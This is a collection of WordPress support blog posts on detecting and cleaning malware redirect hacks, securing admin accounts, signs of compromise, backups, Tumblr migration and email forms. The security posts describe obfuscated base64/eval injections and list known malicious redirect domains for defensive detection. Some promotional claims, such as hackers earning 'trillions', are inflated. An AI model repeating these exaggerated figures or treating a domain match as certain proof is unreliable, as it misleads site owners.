Hackers know this, therefore, they often put malicious code inside these two files or files included in them. This code is not that difficult to spot once you know what to look for. Here are a few characteristics of the code:

It will often be obfuscated
It will have ‘base64()’ and ‘eval()’ functions

Check the following example:

The code above is an example of something you might find in your header.php file. This is how it looks like when it is decoded with base64_decode() function:

The example code is meant to redirect visitors based on certain parameters to a domain called default7 .com and further down it has a redirect chain based on certain conditions that apply to the hacked site visitors individually. Malware redirect hacks are known to use redirect chains that forwarded infected site visitors to the following domains:

default7 .com
test246 .com
test0 .com
distinctfestive .com
ableoccassion .com

If you see any mention of these in your file, that is 100% confirmation that you’ve been hacked.

How to clean the WordPress Malware Redirect Hack

If you have found any similar code injections in your WordPress site files, there are three things you can do in order to recover your hacked WordPress website. Before reading any further we must warn you that first you should create a backup of your WordPress site files and database and compress it in a zip file. Last but not least store the file locally so you can easily access it if you decide to restore it.

1. Replace your active WordPress theme using a freshly downloaded copy

Remove your current WordPress theme files and replace them with ones you have just downloaded. Keep in mind that if you have hardcoded any changes in your theme files then you will need to re-apply them.

2. Replace the infected WordPress core files with the original ones

Next step is to remove your old WordPress core files and replace them with ones you have just downloaded from WordPress.org. In this case, you should make sure that you apply any pending updates as well. A fresh WordPress installation currently has 1835 files. Add plugins, themes and that number rises fast. You can’t check all of the files. That’s why it is important to go through the files in a certain order.

The first file that loads when someone visits your site is ‘index.php’. It is pretty easy to tell if the file has been tampered with. It should be 418-420 bytes in size and it should only load one file using the ‘require()’ function:

require( dirname( __FILE__ ) . ‘/wp-blog-header.php’ );

If you see any other file loaded with the ‘require()’ function that’s most likely malware.

Same goes for ‘wp-config.php’ it should only have one line where function ‘require()’ was used (at the very bottom):

require_once( ABSPATH . ‘wp-settings.php’ );

However, some hosting providers load certain required files or plugins through the wp-config.php, which may add some confusion. But here’s the difference – a hosting provider will never put the file inside the wp-admin and wp-includes directory, but rather inside wp-content/plugins. If a ‘require()’ function was called to fetch a file other then wp-settings.php from these directories then it is most likely malware.

3. Replace all of your WordPress plugins

This is the best solution when it comes to preserving the site’s functionality and layout. It is also the worst solution if you have left parts of the malware code. This can lead to errors, reinfection, site crashing, etc. If your theme was customized, ask your developer to remove the malware for you, or if they are unavailable, hire a professional to do it for you.

4. Remove any of your WordPress file backups

If you keep backups of your WordPress installations then there is a big chance that they contain malware as well so you can’t use them for fully restoring your WordPress site. If those backups are stored as raw files then malware can re-infect your site again and again.

5. Clean your WordPress cache files

Caching your WordPress site is a way to store your static files making faster to load. This also means that malware files are also cached and ready for site manipulation by hackers. We suggest to delete all of your site cache and fully disable it until you’re sure you have it cleaned.

6. Change your WordPress admin login details

A hacked WordPress site means that all of your site content, admin user logins included, all either hacked or manipulated. That said you need to change all of your admin usernames and passwords with new ones. Make sure to reset your wp-config.php salt keys as well so all logged users will be logged out by force.

7. Use no more than 2 admin accounts

We strongly suggest to leave only 1 or 2 admin accounts and downgrade all others to lower user roles such as Authors and Editors. Fewer admins around mean fewer possibilities of having one of those accounts hacked and infecting your WordPress site with malware.

If you need more than 1-2 admins active then you can use our own WP User Admin plugin in order to schedule user role downgrades or upgrades. This way you can set one user as an admin for a specified timeframe and then automatically downgrade him./her to Author or any other preferred user roles.

8. Remove any inactive themes and plugins

One of the most common entry points for hackers is inactive and abandoned plugins and themes. If you’re not using a plugin or theme then it’s best to complete it remove it from your WordPress site or else you risk your site being hacked again and again because of vulnerabilities found in themes which aren’t developed anymore.

9. Change your Database login details

Hacked WordPress sites are also the aftermath of using funny or dead simple login details for their MySQL Database. Make sure you create a unique username and password for each WordPress database you create under your hosting account.

10. Check your wp-config.php file for script injections

One of the first files a hacker is using to inject malware is wp-config.php. This is the main WordPress file so exploiting it makes it easier for the hacker to spread malware in all of your WordPress site files. It can also be used to infect other WordPress sites hosted under the same hosting account.

Safest way to clean this file is to write down the WordPress database login details(database name, username, password and table prefix, delete the live wp-config.php file and use the default wp-config.php(can be found under the name of wp-config-sample.php) and insert the live database details.

11. Change the auth keys for your wp-configh.php file

Once you restore the default wp-config.php file replace the auth keys by generating new ones.

12. Update your WordPress installation

Malware usually spreads throughout your WordPress site core files as well, so as a followup to Step 2. we suggest to update your WordPress as well. There is an option for this job inside your WordPress Dashboard Update page.

13. Check your media directory for malware

Browse your wp-content/uploads directory using an FTP client or your Hosting Panel File Manager and search for any .php, .js and .ico files under your media directories. Your media directories should only contain static files like images and pdf.

14. Run the same procedure for all other WordPress sites

If you host other WordPress sites under the same hosting account then they might be infected as well. In this case, you should clean them all no questions asked or else the rest of the WordPress site will re-infect the recently cleaned ones.

How was your site infected with the WordPress Malicious Redirect

Cleaning your WordPress website from the malware redirect is equally important as to find the reasons your site was infected in the first place. This way you will prevent the hack from happening again. Once you learn how your site was hacked, you are one step ahead of the hacker. You can locate files containing malicious codes and remove any backdoors that granted the hacker with admin privileges. It will also help you create some experience regarding cleaning hacked WordPress sites, this way you will be better in pro-actively securing your other WordPress websites

1. Outdated software

Outdated software (WordPress core, themes, and plugins) is the leading cause of vulnerabilities. Hackers usually know the weaknesses upfront because security vulnerabilities are sometimes noted in the changelogs.

2. Plugin vulnerabilities

Sometimes, even the latest updates can contain bugs – take 5 minutes to read about an issue that occurred with a 0-Day exploit in one of the versions of Easy WP SMTP plugin.

3. Predictable credentials

Using predictable credentials (I’m looking at you, ‘admin’ user!) make it so much easier for brute force attacks to be successful. If anybody gains admin access either by hijacking your existing admin user or by creating a ghost admin through a vulnerability, you have officially lost control over your site.

4. Using nulled themes and plugins

Let me say that I understand the temptation completely. You might be thinkin’ that you can save 50-60 bucks on the theme and not to mention those really expensive WooCommerce extensions that can cost up to $249. Yearly. You also might be thinkin’ that you can redirect that money and use it for marketing. Right? Wrong.

Nothing in this world is free. Nulled themes are not an exception. They will come packed with adware, ransomware or any-kind-of-ware. When that starts crawling through your site, that money you saved will be petty cash compared to what you are going to spend to clean your site and repair the damage (which can be total).

How to Protect your WordPress website from being hacked again

Before handing out suggestions, I will be completely honest. No matter what you do and no matter how dedicated you are to secure your site, there’s always a possibility that someone will succeed in hacking your site. If this makes you want to yell at us in the comment section, I completely understand, but allow me to elaborate.

Your job is to not make it easy for anyone to hack your site. The possibility will always be there, but how fast you catch onto it and how fast you react can make a big difference. If you have proper security, chances are that your site will not suffer any serious damage and that you will be able to bring everything back to normal in no time.

With that in mind, this is the list of things you want to do to keep your site secured:

Protect the login page
Secure your files and database
Update your themes, plugins and WordPress core files
Apply restrictions for bots, certain IPs and countries
Monitor your site

Here you can find an in-depth article on How to Protect your WordPress Site from being Hacked.

It is also good advice to have a subscription with a WordPress Security Service. This will give you constant site monitoring and fast response in case something goes wrong. It does add to monthly expenses and might not be a good fit for any budget, but that depends mostly on how much your site means to you and how much you are ready to spend to keep it secure.

The post How to Detect and Fix WordPress Malware Redirect Hack appeared first on WordPress Support Services by BitofWP.

How to Change your WordPress Default Admin Username

BitofWP — Fri, 11 Oct 2019 22:14:49 +0000

Guess the default admin username for WordPress

WordPress sites are often abused by bruteforce login attacks where hackers are trying to find the correct admin login details(usernames and passwords) in order to break into the WordPress Dashboard and start hacking the site traffic, files and database.

One way to protect your WordPress site from these kinds of attacks is to change the default admin username to a random one. If you keep using the default admin username then you make things easier for bruteforce login attacks since they only have to find or guess the password part of the admin login details.

As most of the things added on top of the default WordPress setup there are two ways to change the admin default username. You can do it manually or you can use a plugin to do it for you. Below we’ll cover both ways for changing the default admin username for your WordPress installation.

How to change your admin username manually

First, log in to your WordPress Dashboard using your default admin username and password.
Create a new admin username. Make sure you use a random name and create a complex password.
Log out and log in using your new admin login details.
Delete the default admin username and make sure to attach any posts created by that user to your new admin account.

Video Guide on changing your WordPress admin username manually

How to change your admin username using a plugin

If you don’t want to get your hands dirty for changing your WordPress admin username then you can use a plugin like Easy Username Updater by Yogesh C. Pant to simplify the process.

Follow the steps below to install, activate and use this plugin in order to rename your default admin usernames.

Go to your WordPress Dashboard and search for Easy Username Updater plugin.
Install and Activate it.
Select the under the Username Update tool under Users sidebar menu.
Select the Update option for the admin username you want to change.
Set a new username and choose if you want to send a notification to this user for the username change.
If you’re changing the username for the account you have logged in you will be automatically logged out of your WordPress Dashboard so enter your new login username and the existing password and login again.

Change admin default username using a WordPress plugin

If you want to simplify the login process and use a simpler login option then use your account email instead along with the password.

If you want to keep reading posts and guides about securing your WordPress website then take a moment to subscribe to our WordPress Security Newsletter form.

                                                                                <span>
                                            First Name </span>











                                                                                <span>
                                            Last Name </span>











                                                                                <span>
                                            Email Address </span>



















            <button type="submit"> <span>Submit</span></button>

Don’t hesitate to comment below if you have any questions or need further information about changing your default WordPress admin username.

The post How to Change your WordPress Default Admin Username appeared first on WordPress Support Services by BitofWP.

How to migrate your Tumblr blog to WordPress in just a few minutes

BitofWP — Tue, 03 Sep 2019 20:10:00 +0000

Tumblr made a blast when it was first released back in the day. A lot of people began using it. If you were one of them, you probably amassed a lot of content. It is also possible that you realized that there are a lot of limitations in using Tumblr and that technology has gone far ahead since. If you are thinking about switching to WordPress but don’t want to leave your Tumblr blog behind, then this article is for you.

The company that released WordPress, Automattic, has acquired Tumblr from Verizon last month, however, the two remain separate platforms. Is it a good idea to switch from Tumblr to WordPress? According to some data available to us, only 0.1% of websites use Tumblr while WordPress is accounting for 34% of the web. So you are not alone in this idea.

Also, the next thing to consider is – options. WordPress gives you total control over your content. There are tens of thousands of themes to choose from, both free and premium and even more plugins to extend the functionality of your website. You are also able to code anything you want yourself (as long as you have the know-how).

Feel free to make up your mind and make the switch. Transition to WordPress is both painless and easy. There are two methods that we can suggest:

Using the WordPress Tumblr tool with Tumblr API
Automated migration (not free)

1. Import Tumblr content by using WordPress Tool + Tumblr API

This method will contain 9 steps. Essentially, you will be installing one of the available tools from WordPress. In order to connect it to Tumblr and proceed with the import, you will need to register an application on Tumblr. Don’t worry if it sounds confusing. Just follow the steps below.

1.1 Installing WordPress Tumblr tool

If this is not your first ‘rodeo’, then you know that we always make a backup before doing anything else. It is an ancient tradition among our people, plus it is a life-saver if something goes wrong. But don’t worry, it won’t. Even if it does, you have a backup.

Head over to ‘Tools -> Import’. You will see a list of available tools. Find the Tumblr tool and click ‘Install Now’. The ‘Install Now’ will change to ‘Run Importer’ when the installation is finished. Click on ‘Run Importer’.

1.2. Connect the tool to Tumblr

First of all, you will need to connect the tool to Tumblr. This requires creating an ‘app’ on Tumblr because you will need OAuth Consumer Key and Secret key.

You will see a link http://www.tumblr.com/oauth/apps. You will have to be logged in to your Tumblr account at this point. After clicking on the link, you should see a page like this:

Click on Register Application. This page will open up:

While the application name can be anything you want, you will need to copy the exact URL provided in the tool page and paste it into “Application Website” and “Default Callback URL” fields. If you followed the instructions, you should see your app along with its keys at the top of the page:

Copy and paste the keys into the tool page. The next thing to do is authorize the application. You will see a screen like this:

After you click on ‘Authorize the Application’ you will be taken back to the Tumblr confirmation page.

Click ‘Allow’ and you’re all set to go. You will be redirected back to your site and you will see the button ‘Import this blog’.

1.3 Running the importer

This process might take a while depending on the size of the site. It is also not uncommon to see that some images haven’t transferred over. You will most likely have to wave goodbye to likes and comments as well.

Another reason why something might be missing is hosting. If the import got stuck or interrupted and you start it again, it will import duplicate content.

1.4 Redirecting the visitors to your new WordPress site (optional)

We wrote ‘optional’ above while, to some, this is not optional at all. It is understandable if you fear that this migration will cost you visitors and traffic because it might feel like starting all over.

In order to automatically redirect all your visitors from Tumblr to your new WordPress site, you’ll need to use some JavaScript. Don’t worry because the code is already written. You just need to make one small change and place two pieces of code in the right places.

First of all, go to Tumblr, click on the _account _icon and then click on ‘Edit Appearance’ at the bottom of the drop-down menu. Next, click on ‘Edit theme’. This will take you to the customization page. In the top left corner, you will see ‘Edit HTML’. Click it.

This will open the raw HTML of the theme. Locate the closing </code> tag and paste this just above it:

<script type='text/javascript'> var new_slug = window.location.pathname; var new_root = "http://yoursite.com"; var new_url = new_root + new_slug; document.write("<link rel=\"canonical\" href=\"" + new_url + "\">"); </script>

Just replace “http://yoursite.com” with the URL of your new WordPress site.

There’s just one other small piece of code to add and that’s it. Find the closing

Did your WordPress site get hacked? Find out what to do next!

BitofWP — Wed, 31 Jul 2019 00:25:10 +0000

WordPress Hacked Issues?

If you’re using WordPress, you should know that it gets hacked more often than any other CMS or platform. That’s because of its enormous popularity. In fact, WordPress now powers over 33% of the web accounting for nearly 75,000,000 sites.

As such, WordPress is often targeted by hackers for profit. Hacking has become a very lucrative (though illegal) business, earning hackers trillions of dollars each year. That’s right. Trillions. According to some sources, cybercrime generates at least $1.5 trillion annually, costing companies of all sizes a lot more money than they’d like to lose.

These statistics show that hacking is a real threat and that it can happen to anybody. In fact, it may have already happened to you.

If your WordPress website has been hacked (or you want to know what to do if it is), keep reading. We’ve outlined the consequences of a hacked WordPress site, how to tell if your site has been compromised, and what to do in case your site is overtaken by cybercriminals.

The Consequences of a Hacked WordPress Site

First and foremost, when your site gets hacked, know that you’ve lost all control over it. Someone else has broken in and can access it, change it, deface it, or even delete it if they want to. Keep in mind, however, that deleting your site is not likely to happen. That’s because hacks are typically initiated for the purpose of accessing protected information or for use as a legitimate site to redirect users to a hacker’s website. The WordPress Pharma Hack is an example of such malware infection.

Sites with good SEO rankings are an obvious target – hackers will use the hard-earned reputation of highly trafficked websites that rank well in search results and redirect that traffic on their own site. This simultaneously increases their traffic numbers and search rankings, while in turn reducing the organic traffic on the hacked site. If you’re running an online business, this means that you will start to lose money and customers very soon.

On top of that, Google and other major search engines have developed algorithms to recognize sites infected with malware automatically. Website hacks are bad enough by themselves, but your problems can get even bigger if Google notices your website is hacked.

Now let’s take a look at how people can tell if your WordPress site has been hacked.

How People Can Tell If Your WordPress Site Has Been Hacked

It can be tough to know when your site has been hacked because cybercriminals are stealthy when they overtake a website and use it for their own gain. That said, if someone runs a Google search and your hacked WordPress site pops up in the search results, they may notice a message like this:

This message might appear under your site if the Google algorithm detects one (or more) of the following issues:

Your site has been altered by a third-party.
Suspicious links or pages on your site which are not malware related in a way that would infect your users, but still shouldn’t be there. (e.g., hidden and cloaked spam pages selling things like Viagra products).
Malware Redirects that take site visitors to another website once clicking on your Google search results

A warning like this can reduce site traffic by as much as 95%. And the worst part is, Google still hasn’t detected any malware on your site. It is only issuing a warning to potential visitors but has the power to convince people not to visit your site.

In the case Google does find malware on your site, your site will get quarantined and blacklisted.

Next, Google will remove your website pages and posts from its search results. Then, when someone tries to access your site directly, they will see a warning saying that “The site ahead contains malware.” The message might vary depending on the browser, but will look similar to this:

So, apart from having to clean malware from your site, you will also have to remove your site from the Google blacklist(and any other search engines blacklists).

Every day your site spends in quarantine will cost you money, your reputation, and your SEO rankings. If you rely on your website to generate revenue, this can be devastating.

While you can clean your site and delist it from Google’s Blacklist yourself, it might be a good idea to hire a professional WordPress Security company to do it for you. They will have the tools and experience to Fix your WordPress Hacked Site better and faster, resulting in less downtime for your site.

Now let’s look at how you can tell whether your site has been hacked.

5 Signs Your WordPress Site Has Been Hacked

Let’s say your site hasn’t been blacklisted yet, but you think that it might be compromised.

Here’s a list of 5 things that should cause you concern.

1. Your Homepage has been defaced

There once was a time when Vogue’s UK site was defaced with a bunch of velociraptors.

While this may seem humorous, this is just one example out of many where hackers break into a website and leave special messages for site visitors to see. And no matter how silly they may seem on the surface, the truth is, defacement of a website can have a negative impact on your business.

That said, most hackers are not breaking into sites to play around; they are looking to profit off your hard work without anyone noticing. If hackers have changed your homepage to include something that they thought was funny, like a troll message or ‘hacked by’ calling card, they are usually doing it to gain notoriety. It’s also a pretty obvious sign that your site has been compromised.

2. Your WordPress site performance has dropped

When the site is under a ‘Brute Force Attack’ or there is a malicious script using your server’s resources, you’re likely to notice that your site takes longer to respond to clicks or even returns 503 server errors. It may even crash because the strain is too much for your servers to handle at once.

That said, a slow loading website might not necessarily be hacked because many things affect site speed and performance. For example, your site may take longer to load because of things like:

A strain on the server resources in a shared hosting environment
Major WordPress core updates and compatibility issues
A bloated plugin inflating your database
Image files that are too large
Caching issues

However, if none of this applies to your site, then a drop in performance might indicate that the site is infected or under a DDoS attack.

3. Files with weird names and content are listed in your site directory

PHP files with names such as file25.php’, or what looks like gibberish code, is a major sign that your site has been compromised. Although hackers are more diligent nowadays and try to name the malicious files so they can pass as a plugin or theme file, it is not uncommon to find PHP files with weird names. Another red flag is seeing all these files having the same modification date which differs from one of your WordPress core files.

4. Your Email list grew huge overnight

Some website owners don’t secure their WordPress registration forms. This allows spam bots to register as subscribers and post spam contents right on their sites.

Spam is bad enough on its own, but excess spam indicates an attempt by someone to create an admin user by exploiting plugin vulnerabilities. A 0-day vulnerability has recently been uncovered in the Easy WP SMTP plugin that allowed hackers to register as subscribers but grant themselves admin privileges. And once someone has admin privileges on your site, they can do whatever they like.

5. Admin login details have been changed

If you try to log into your WordPress site and can’t, you should be worried.

When this happens, it usually means a hacker has already gained access to your site and has locked you out by removing your admin user so that they can have total control over the site.

How to Fix a Hacked WordPress Site

In order for any hack to work, malicious files must be placed in your WordPress directory. It can be anywhere: WordPress core, plugin and theme files and the “wp-content/uploads” directory. Depending on the hack, malware code might be hidden in the database as well.

In order to properly remove malware from your site you have to follow these 5 steps:

1. Scan for File Content Differences

There are a lot of WordPress security plugins and online services which will search all WordPress core files, 3rd party themes and plugins, and the posts and comments tables of your database for suspicious entries and unusual filenames. This will help you isolate the rogue hacked and malware files and delete them.

2. Delete the Rogue Hacked and Malware Files

After you have isolated the malware files using a security plugin (or by searching manually) you should delete them. If the files are residing in a directory of a free plugin (like Akismet), then it’s best to delete the entire plugin directory and just download and upload a fresh install. All plugin settings are saved separately in the database, therefore, all of your settings will be preserved.

3. Check the .htaccess File (and Regenerate If Needed)

The .htaccess file can contain redirects to malicious sites, therefore this is a good place to check. If you are seeing any suspicious code, you can just delete it and regenerate it by going to Settings > Permalinks in the WordPress dashboard and clicking Save. You must regenerate the .htaccess file because all pages (except the home page) will return a 404 error if you don’t. This is how the default WordPress .htaccess file looks like.

4. Remove Malicious Code from the WordPress Database

This step will involve using SQL queries and the phpMyAdmin Search tab to find suspicious database entries and delete them. You can find the phpMyAdmin database tool inside your hosting panel, if you’re having trouble locating it then we suggest to ask your hosting provider support for help.

5. Utilize Google Search Console

Google Search Console (previously Google Webmaster Tools) is a great asset. It can be used to diagnose suspicious activity and lift penalties imposed by Google after you’ve been hacked and blacklisted.

Google Search Console will notify you when your site is hacked. This will help you initiate a timely response and clean your site as soon as possible. It will also help you with re-indexing your site after it is cleaned to get it back in Google search results. In time, this will help you restore your SEO rankings.

How to Protect Your WordPress Site from Hackers

Now that you have read (or even worse, experienced) how malware affects your site and SEO rankings, and you want to prevent it from happening to you, here are five steps to fortify your WordPress site:

1. Protect the Login Page

One of the first steps in preventing unauthorized access to your site is limiting the number of login attempts. Changing your WordPress login URL is a good idea as well.

2. Secure Your Files and Database

Next, set the appropriate permissions for files and directories on your server, disallow file editing, and change the database prefix. You can do all of this by using a proper WordPress security plugin.

3. Regularly Update Your Themes, Plugins, and WordPress Core Files

It’s important you always keep software updated. Outdated software is the leading cause of security breaches for WordPress sites.

4. Apply Restrictions for Bots, Certain IPs, and Countries

Blocking bots can help maintain your site performance and prevent spam-bots from hitting your site. Unless you are running a big enterprise site, you don’t need to block them all. You can block some IPs and countries.

5. Monitor Your Site

Always monitor your website for suspicious activity, or use an audit and scanner plugin to help. Many reliable plugins will notify you when there are any changes to your files and database.

Congratulations! You made it this far. So…now what?

WordPress Malware Infections can be tricky. Hackers don’t want people knowing that their sites have been hacked and are being used to profit someone else so they make sure to hide their malware really deep so you can’t notice them.

Unless you are experienced in WordPress file and database management, it’s possible that you’ll overlook some malicious files. If these backdoors remain on your site, hackers will easily hack it again and again. They will also hack all other sites hosted under the same hosting account. Then you’re back to square one or worst.

That’s why it may be a good idea to properly maintain your WordPress website by keeping daily backups and run any pending updates, especially the ones which were published in order to fix WordPress exploits and vulnerabilities. If you don’t have the time or the expertise to run those tasks then we strongly suggest seeking help from a WordPress Support and Maintenance service which can maintain and secure your WordPress site and for a small monthly fee.

The post Did your WordPress site get hacked? Find out what to do next! appeared first on WordPress Support Services by BitofWP.

How to Create an On-demand and Automatic WordPress Backup

BitofWP — Mon, 22 Jul 2019 23:21:55 +0000

A Beginner’s Guide To Setting Up a FailProof WordPress Backup

Below we will show you how to run an On-Demand WordPress Backup using cPanel hosting control panel, in this guide we’ll use both the cPanel built-in backup feature and the File Manager manual backup using the archive option alongside the phpMyAdmin Database export option. We will also show you how to automate your WordPress backups using WP Backup Bank free and premium features.

One of the most neglected tasks of site owners is making sure they always have a recent backup available and easy to access. Backing up your WordPress site should be the first thing to do after setting up your WordPress Vanilla installation. If you think that this is a set and forget task then you should think twice because you must initially check the backup is running without any issues and the generated files are actually ready to be used for restoring your WordPress site. If you’re using an automated service for your backing your WordPress site then you need also to check often that they are running and working as expected.

Do I Really Need to Backup my WordPress Site Files and Database?

If there was one advice we would give to all of my clients is to make sure they have set up a running daily backup for their WordPress sites. If they did then they wouldn’t have to worry for losing their site content or important configurations due to hacking, hosting going down or even downtime from maintenance tasks which went wrong. When we start cleaning a WordPress hacked website the first and the last thing we do is to create a backup of the WordPress site files and database, this way we make sure their site content is fully protected and maintained.

How Often Should I Run a WordPress Backup?

Daily backups of both your WordPress site files and database are recommended. You can either keep backups for a whole week or a whole month, it all depends on where you want to store them and how big your site is in terms of space. Additionally, you should always create a WordPress backup before an upgrade or maintenance task.

Where Should I Store my WordPress Backups

You can store them locally under a directory not available to public access but you should also consider a remote service such a Dropbox or Google Drive. The latter option is preferable because if your site goes offline or your hosting provider bans you from accessing your hosting account then you will be able to restore your WordPress site using the remote backup. This also satisfies another important principle; avoiding a Single Point of Failure(SPOF) in your WordPress site infrastructure.

Should I Run a Manual Backup or an Automatic One for my WordPress Site?

We strongly recommend to set up a system where backups run automatically using either WordPress plugins or other 3rd party services like ManageWP. On-demand backups are also useful before a major upgrade or maintenance task.

Manual Backup in cPanel

Any given WordPress site consists of two parts: the files and the database.

The files contain images, plugins, themes, any other media or uploaded scripts, WordPress core, configuration files, etc.

The database contains users and their credentials, posts, pages, settings, etc. (For example, WooCommerce orders are stored in the database).

When creating a WordPress backup you will need to backup both the files and the database properly. However, you will not need to backup all of your site files. You only need to archive and download the ‘wp-content’ directory and export the database. Here are step-by-step instructions on how to do it.

Accessing the files

Log in to your cPanel dashboard and click on the ‘File Manager’. You will see a list of different directories. Enter the ‘public_html’ directory. You should see the following directories: wp-admin, wp-content, wp-includes and a number of WordPress core files (like wp-config.php).

The WordPress core consists of directories and files starting with the ‘wp-‘ prefix. You will not need to create a backup of these files. Almost none of the customizations or information is stored in the core files and they are never altered in any way (or at least, they shouldn’t be altered).

Backup your WordPress Core Configuration Files

There’s a number of config files that you will see in your WordPress installation, the following are the most important which must be stored in a backup:

.htaccess – This is the Apache server configuration file. It can control redirections, cache headers, and permalinks. If you have customizations in this file, it is not a bad idea to create a copy and save it.

wp-config.php – The main WordPress configuration file. It controls the connection between the WordPress files and database, among other things.

The .ini files – These are configuration files that can control PHP settings on the server: memory limit, the maximum file size for upload, etc. It can be named ‘.user.ini’ or ‘php.ini’ (also php5.ini and php56.ini for older PHP versions). Again, if you have important customizations in this file, make a copy.

Creating a .zip archive of the ‘wp-content’ WordPress Directory

Next, locate the ‘wp-content’ directory, right-click on it and select ‘Compress’. You will see a number of options including the type of compression that will be used. I suggest using .zip although you can use other types of compression if you are comfortable with them.

It is wise to exclude some directories from the backup. For example, you will not need to include ‘cache’ or any backup plugin directories (like ‘updraft’). I recommend going inside the ‘wp-content’ directory and creating a partial backup. You can select ‘plugins’,’themes’ and ‘uploads’ directories and zip them.

In some special cases, you might want to exclude something from the ‘uploads’ directory. This directory is used to store images and plugin data, but some backup plugins store the backups inside this directory as well.

Download the Compressed Backup File

Right-click on the archive you just created and download it to your local machine. You can keep the backup on your HDD or upload it to DropBox or similar cloud service.

Exporting the database

Go back to the homepage of the cPanel dashboard. You will see the ‘phpMyAdmin’ icon under ‘Databases’ section. Click on the icon and a new tab will open with phpMyAdmin dashboard.

There might be more than one database on the server. To be sure which one is correct, check the wp-config.php. There will be a line that looks like this:

define('DB_NAME','xxxxxxxxxxxxxxxxxx');

The x’s are of course the database name you should look for.

Click on the desired database and then, on the right side, click on the ‘Export’ tab.

Generally, there’s no need to make any changes to the default settings. Just click ‘Go’ and wait for the database to download.

That’s it. You’ve successfully created a backup of your files and database.

Automated WordPress Backups

The BackupBank plugin is one of the easiest to use WordPress plugins which will help you automate the backup procedure of your WordPress website. Below we’ve created a small guide on how to set up and use this backup plugin in just a few minutes.

BackupWP Plugin Setup and Usage Instructions

BackupBank comes in free and Pro format. We will review the features available in the free version and discuss some advantages of the Pro version afterwards.

The first thing you need to do is install the plugin. Go to ‘Plugins -> Add New’ and search for the ‘BackupBank’ plugin. After you install the plugin, activate it and visit your the plugin dashboard. The first thing you will see is the Opt-In for Email Notifications and Updates. If you agree with this, some data about the usage of the plugin will be sent to the author. If this brings up a touch of paranoia, feel free to click ‘Skip & Continue’.

Configuring the WordPress Backup Plugin Options

When you click on the ‘Start backup’ in the plugin dashboard, you will see a few options to choose from. For majority of purposes, going with the default settings is the best option. The settings that you can change are:

*Backup type * – You can choose between Complete Backup or partial backup (plugins, themes, themes + plugins, etc.)
*Exclude list – * You can exclude files that you know you won’t need in a backup (like .zip files)
*File Compression type – * zip, tar, etc. Choose whatever you prefer
*DB Compression type – * It is probably the best to go with the .sql but again, it’s a matter of preference

Furthermore, you can exclude certain tables from the database backup. Only do this if you are certain that the absence of data in a database table will not bring the site down. An example of unnecessary data is 404 redirections table coming from certain plugins. If uncertain, don’t exclude any of the tables.

Last but not the least is choosing the *destination * of the backup. As you can see from the screenshot above, the available destinations in the free version are:

Local folder – meaning, the folder on the server where your site is hosted
Email – Not recommended, as most email providers limit the size of the data to 25MB and your site will most likely be bigger than that
FTP – You can use this to store the backups on a different server using FTP credentials
Dropbox – This will require getting the API keys from Dropbox (not covered in this article)
Google Drive – This will require getting the Cliend ID and Client Secret from Google (covered in this article)

Storing backups on Google Drive

To follow the instructions in this section, you will need a Google account. If you have a Gmail address, you’re good to go.

Access the Google API library

In the previous screenshot, you’ll notice that there’s a link labelled ‘Configure!’ next to the ‘Google Drive’ radio button. Click on it and you will be taken to the configuration page that looks like this:

Click on ‘Get Client Id & Client Secret. This will take you to the Google Developers Console. Do not be intimidated by the ever-confusing Google as we are going to tackle it in the next steps. Just follow through and you’ll be set in a few minutes.

Find & enable the Google Drive API

The API will be located in the library. Just type ‘Google Drive API’ in the search bar (see screenshot above) and then click ‘Enable’. If you’ve already activated it, you will see the blue ‘Manage’ button. It’s not necessary to click on it right now. Proceed to the next step.

Create a project

We already created a project. You should click on the new project and enter its name. That will be enough for now. Proceed to the next step.

Creating credentials and API keys

First thing you need to do is create OAuth Client ID. Click on ‘Credentials’ in the left sidebar and then click on OAuth Client ID from the drop-down.

On the next screen, select ‘Other’ under ‘Application type’ and name it anything you want. After you click create, you will see the Client ID and Client Secret that you need to copy and paste into the corresponding fields in the BackupBank plugin.

After that click on ‘Save changes’ on the plugin page and you will be taken to the verification page.

Choose the Google account where you created the credentials.

To keep this simple, we haven’t completed all of the steps needed to verify the connection, therefore, this will result in a warning. Click on ‘Advanced’ and then click ‘Go to BackupBank’.

After this, you will be prompted to allow access. Click ‘Allow’ and you’ll be able to store your backups directly to Google Drive.

The Pro features

There are features available in the Pro version that can make it even easier to run your backups timely and properly. These features are:

Different cloud storage services – OneDrive, Microsoft Azure, Amazon S3 and Rackspace are available only in Pro version
Scheduling the backups – This is probably the most important Pro feature. That way, you can schedule your backups and not have to initiate them manually every time
Alerts and notifications – The Pro version will notify you when the backup or restore has been generated, completed or has failed which is also an important feature
Roles & Capabilities – This allows you to control what level of access a user needs to have to access and control backups

If you can go without these features, then the Free version will do just fine. If this sounds like too much of a hassle for you, you might want to consider subscribing to our WordPress Maintenance Services which amongst other features, such as Malware Scanning and Cleaning, we offer to our clients we also keep daily backups of their WordPress sites.

The post How to Create an On-demand and Automatic WordPress Backup appeared first on WordPress Support Services by BitofWP.

How to Add an AWeber email signup form to your WordPress website

BitofWP — Fri, 31 May 2019 18:15:21 +0000

Email promoting is one of the greatest advertising tools that can be utilized. Even in the age of social networks, it remains one of the main channels of communication. The return on investment is reported to be over 4000%, which means that you get over $40 on every dollar you invest!

In order to do it properly and increase your following, you need to have a good email advertising administration. This means that you need to constantly develop your email list and thereby get new clients while keeping the old clients in the loop. Having an autoresponder that will send follow up messages is a must-have.

Using your default email server can be a limiting factor. Those servers tend to have 500 emails-a-day limits, they can get blocked by some of the biggest companies like Google and Yahoo and cut your communication to your clients. That’s where email marketing services come into play. There are a lot of options to choose from AWeber, MailChimp, ActiveCampaign, GetResponse etc.

Adding an AWeber Form to your WordPress website

There are different factors that can help you make a choice. A simple matter of preference is one of them. But if you have a WordPress site and want to put a Sign-up form on it, AWeber is a solution that is fast, simple and doesn’t require coding knowledge. It is quite easy to add AWeber signup form on your site and you have to do the following:

Sign Up for AWeber
Create a form
Add the form to your WordPress site

1. Sign Up for AWeber

The first step is creating an account on AWeber. There are standard fields that need to be filled out like name, country, address, etc. There’s a 30-day Free Trial but you will have to fill out the billing info nonetheless.

After filling out the billing info, select the first of the three offered payment plans – Monthly: First Month FREE (Then only $19 monthly!). After that, scroll down to the bottom and click the green button ‘Start My Free Trial’.

You will be taken through a 3 step-form to fill out a confirmation message for your future subscribers. When you’ve completed that, choose Sign Up Forms from the top bar and proceed to the next step.

2. Creating a Sign-Up Form

Click on the green button ‘Create a Sign-Up Form’.

The page that you’ll see is where all the magic happens. You will have a large number of templates at your disposal to choose from. This will give you a way to customize the form to your satisfaction.

